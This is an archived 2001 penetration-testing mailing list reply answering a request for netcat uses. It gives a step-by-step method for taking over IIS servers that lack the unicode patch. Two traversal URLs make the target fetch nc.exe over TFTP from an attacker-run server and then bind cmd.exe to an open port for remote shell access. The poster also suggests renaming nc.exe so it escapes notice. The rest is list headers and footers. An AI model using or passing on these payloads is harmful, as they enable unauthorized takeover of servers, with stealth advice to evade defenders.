Re: Ideas on netcat

From: Assess (assessat_private)
Date: Mon Aug 27 2001 - 15:01:35 PDT

Next message: Penetration Testing: "Re: Ideas on netcat"

Previous message: Kevin A.. Colin: "Using Airsnort through vmware on Red Hat 7.1"
In reply to: Vo0d0o: "Ideas on netcat"
Next in thread: Penetration Testing: "Re: Ideas on netcat"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a simple way to take over an  IIS web server without the unicode
patch. It requires a firewall has TFTP outbound active and an inbound port
available with nothing loaded on it. While several things must occur for
this to work I have had it work twice out of ten assessments so the odds may
still be good. You may want to rename nc.exe to something less obvious.

Get Netcat from your tftp server

http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system3
2/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe

Start netcat on port23 or any port that is open inbound, and unused, through
the firewall. TCP port 53 works more often than not if DNS has been
configured incorrectly.

http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cm
d.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe

Telnet to the port on the target system. If it works you should have a c:\
prompt.

----- Original Message -----
From: "Vo0d0o" <voodoooat_private>
To: <pen-testat_private>
Sent: Friday, August 24, 2001 2:29 AM
Subject: Ideas on netcat



To all netcat gurus,

I hav been experimentin on netcat for a few days and searchin almost
everyday on netcat for some possible uses ,but in vain.

As far as I know, no site is giving some other uses of netcat pertaining to
pen-testing ...other than the usual *README* file which I find too basic.

I would be grateful if anybody could throw some light on uses of netcat in
pen-testing.

Thanx in advance.

Cheers,
Kartik.






----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/




----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Penetration Testing: "Re: Ideas on netcat"
Previous message: Kevin A.. Colin: "Using Airsnort through vmware on Red Hat 7.1"
In reply to: Vo0d0o: "Ideas on netcat"
Next in thread: Penetration Testing: "Re: Ideas on netcat"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:50:18 PDT